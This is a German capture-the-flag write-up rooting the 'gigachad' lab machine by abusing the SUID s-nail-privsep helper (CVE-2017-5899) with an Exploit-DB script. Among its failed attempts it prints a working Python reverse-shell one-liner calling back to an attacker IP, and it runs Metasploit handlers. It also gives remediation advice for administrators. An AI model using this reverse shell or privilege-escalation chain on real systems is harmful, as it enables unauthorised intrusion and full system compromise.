██████████████████████████▀▀██████
██████████████████████████▀▀▄▄▀▀█▀▄▀▀▀▀██


                     

Analyse: Gibt den Inhalt von `user.txt` aus.

Bewertung: Enthält ASCII-Art und den Hinweis "flag 1/2". Die eigentliche Flagge (`c7d...`) wird im Flags-Abschnitt des Berichts aufgeführt.

Empfehlung (Pentester): User-Flagge notieren. Weiter nach Privesc-Möglichkeiten suchen.
Empfehlung (Admin): Keine Aktion.

chad@gigachad$ getcap -r / 2>/dev/null

                     

Analyse: Sucht nach Dateien mit Linux Capabilities.

Bewertung: Keine Capabilities gefunden. Dieser Vektor ist nicht verfügbar.

Empfehlung (Pentester): Konzentrieren Sie sich auf andere Vektoren wie SUID.
Empfehlung (Admin): Gute Konfiguration (keine unnötigen Capabilities).

chad@gigachad$ find / -type f -perm -4000 -ls 2>/dev/null
    25269    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
    31941     12 -rwsr-xr-x   1 root     root        10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep 
    21909     52 -rwsr-xr--   1 root     messagebus    51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    16365     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
       81     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
     4028     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount
       76     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn
     4030     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount
     3547     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
     3694     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
       79     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
       77     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
                     

Analyse: Erneute Suche nach SUID-Binaries.

Bewertung: Die Liste enthält wieder viele Standarddateien. `/usr/lib/s-nail/s-nail-privsep` sticht heraus. S-nail ist ein Mail-Client, und SUID-Helper dafür sind bekannt für Privesc-Schwachstellen in älteren Versionen (Datum 2016 deutet auf eine alte Version hin).

Empfehlung (Pentester): Suchen Sie mit `searchsploit` oder online nach bekannten Exploits für `s-nail` oder speziell `s-nail-privsep`. Dies ist der wahrscheinlichste Privesc-Vektor.
Empfehlung (Admin): Aktualisieren Sie `s-nail` oder entfernen Sie das SUID-Bit vom Helper (`chmod u-s /usr/lib/s-nail/s-nail-privsep`), wenn es nicht unbedingt benötigt wird.

Privilege Escalation Preparation

Basierend auf dem Fund des SUID-Binaries `s-nail-privsep` suchen wir nach bekannten Exploits.

┌──(root㉿Cybermaschine)-[~] └─# searchsploit s-nail
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                      |  Path
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
S-nail < 14.8.16 - Local Privilege Escalation                                                                                                       | multiple/local/47172.sh
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
                    

Analyse: `searchsploit s-nail` durchsucht die lokale Exploit-DB-Kopie nach Exploits, die "s-nail" enthalten.

Bewertung: Ein passender Exploit wird gefunden: `multiple/local/47172.sh` für "S-nail < 14.8.16 - Local Privilege Escalation". Dies passt gut zu dem alten Datum (2016) der gefundenen Binärdatei.

Empfehlung (Pentester): Kopieren Sie diesen Exploit (`searchsploit -m multiple/local/47172.sh`) und untersuchen Sie ihn. Übertragen Sie ihn auf das Zielsystem (z.B. nach `/tmp`).
Empfehlung (Admin): Patching von `s-nail` ist erforderlich.

┌──(root㉿Cybermaschine)-[~] └─# searchsploit -m multiple/local/47172.sh
  Exploit: S-nail < 14.8.16 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/47172
     Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
    Codes: CVE-2017-5899
 Verified: False
File Type: POSIX shell script, ASCII text executable 
Copied to: /root/47172.sh
                     

Analyse: Der Befehl kopiert den Exploit-Code in das aktuelle Verzeichnis (`/root/47172.sh`). Zusätzliche Informationen wie die zugehörige CVE (CVE-2017-5899) werden angezeigt.

Bewertung: Der Exploit steht nun zur Übertragung und Ausführung bereit.

Empfehlung (Pentester): Übertragen Sie `47172.sh` auf das Ziel (`/tmp`), geben Sie ihm Ausführrechte (`chmod +x`) und führen Sie ihn aus.
Empfehlung (Admin): Keine Aktion.

An dieser Stelle folgen im Log einige fehlgeschlagene oder abgebrochene Versuche mit Metasploit (Handler, Reverse Shell, su_login Exploit). Diese scheinen nicht zum Erfolg geführt zu haben und wurden zugunsten des lokalen s-nail-Exploits verworfen.

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.199:5555
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.2.117 - Command shell session 1 closed.
                    
chad@gigachad:/var/www/html$ echo "id" > /var/www/html/bind/bind.php
-bash: /var/www/html/bind/bind.php: Permission denied
                     
chad@gigachad:/var/www/html$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

                    
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/su_login
msf6 exploit(linux/local/su_login) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Exploit completed, but no session was created.
                     

Analyse: Versuche, eine Reverse Shell über Python zu etablieren und den Metasploit-Exploit `su_login` zu verwenden, wurden unternommen.

Bewertung: Diese Versuche waren nicht erfolgreich oder wurden abgebrochen. Der Metasploit-Handler empfing keine gültige Session, der Schreibversuch im Webverzeichnis scheiterte an Berechtigungen, und der `su_login`-Exploit konnte keine Sitzung erstellen (wahrscheinlich, weil kein gültiges Root-Passwort bekannt war).

Empfehlung (Pentester): Konzentrieren Sie sich auf den vielversprechenderen lokalen Exploit für `s-nail` (47172.sh).
Empfehlung (Admin): Diese Versuche unterstreichen die Notwendigkeit, ausgehende Verbindungen zu kontrollieren und die Berechtigungen im Web-Verzeichnis korrekt zu setzen.

Proof of Concept (Privilege Escalation via S-nail CVE-2017-5899)

Dieser Abschnitt beschreibt die Ausnutzung der Schwachstelle CVE-2017-5899 im SUID-Binary `/usr/lib/s-nail/s-nail-privsep`, um Root-Rechte zu erlangen.

Kurzbeschreibung: Der `find`-Befehl identifizierte `/usr/lib/s-nail/s-nail-privsep` als SUID-Root-Binary. `searchsploit` fand den Exploit `47172.sh` für CVE-2017-5899, der diese Binärdatei in anfälligen Versionen zur Privilegienerweiterung ausnutzt.

Voraussetzungen: Shell-Zugriff als Benutzer `chad`. Übertragung des Exploit-Skripts `47172.sh` auf das Zielsystem (z.B. nach `/tmp/ex.sh`).

Schritt 1: Vorbereitung des Exploits auf dem Zielsystem

Wir gehen davon aus, dass der Exploit `47172.sh` nach `/tmp/ex.sh` auf das Zielsystem übertragen wurde.

chad@gigachad$ cd /tmp/
chad@gigachad:/tmp$ vi ex.sh

                     

Analyse: Wechseln in das `/tmp`-Verzeichnis und Öffnen/Erstellen der Exploit-Datei `ex.sh` mit `vi`.

Bewertung: Vorbereitung des Exploit-Skripts.

Empfehlung (Pentester): Stellen Sie sicher, dass der Inhalt von `47172.sh` korrekt in `ex.sh` eingefügt wurde.
Empfehlung (Admin): Überwachen Sie verdächtige Aktivitäten im `/tmp`-Verzeichnis. Erwägen Sie, `/tmp` mit `noexec` zu mounten, um die Ausführung von Skripten zu verhindern (dies kann jedoch legitime Anwendungen beeinträchtigen).

chad@gigachad:/tmp$ ./ex.sh
-bash: ./ex.sh: Permission denied
                     

Analyse: Erster Versuch, das Skript auszuführen.

Bewertung: Schlägt fehl, da die Datei keine Ausführrechte hat.

Empfehlung (Pentester): Fügen Sie Ausführrechte hinzu (`chmod +x`).
Empfehlung (Admin): Keine Aktion.

chad@gigachad:/tmp$ chmod +x ex.sh

                     

Analyse: Fügt dem Skript Ausführrechte hinzu.

Bewertung: Notwendiger Schritt.

Empfehlung (Pentester): Führen Sie das Skript jetzt aus.
Empfehlung (Admin): Keine Aktion.

Schritt 2: Ausführung des Exploits

chad@gigachad:/tmp$ ./ex.sh
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
#
                     

Analyse: Das Exploit-Skript `ex.sh` wird ausgeführt. Es findet die anfällige SUID-Binärdatei, kompiliert eine kleine C-Datei (wahrscheinlich eine Shared Library, die über Umgebungsvariablen geladen wird, um die Schwachstelle auszunutzen) und führt den Exploit aus.

Bewertung: Erfolg! Der Prompt wechselt zu `#`, was den Root-Benutzer anzeigt.

Empfehlung (Pentester): Überprüfen Sie die Rechte mit `id`.
Empfehlung (Admin): Dringend `s-nail` patchen oder SUID-Bit entfernen.

Schritt 3: Bestätigung des Root-Zugriffs

# id
uid=0(root) gid=0(root) groups=1000(chad) 

                     

Analyse: Der `id`-Befehl wird in der neuen Shell ausgeführt.

Bewertung: Bestätigt `uid=0(root)`. Die Privilegienerweiterung mittels CVE-2017-5899 war erfolgreich.

Empfehlung (Pentester): Ziel erreicht. Sammeln Sie die Root-Flagge.
Empfehlung (Admin): Dringendes Patching erforderlich.

Risikobewertung: Die Kombination aus einem erratbaren SSH-Passwort (durch OSINT/Custom Wordlist) und der ungepatchten S-nail SUID-Schwachstelle (CVE-2017-5899) stellt ein hohes Risiko dar, das zur vollständigen Systemkompromittierung führte.

Empfehlungen (Zusammenfassung):

Flags

cat /home/chad/user.txt
c7d0a8de1e03b25a6f7ed2d91b94dad6
cat /root/root.txt
5C42D6BB0EE9CE4CB7E7349652C45C4A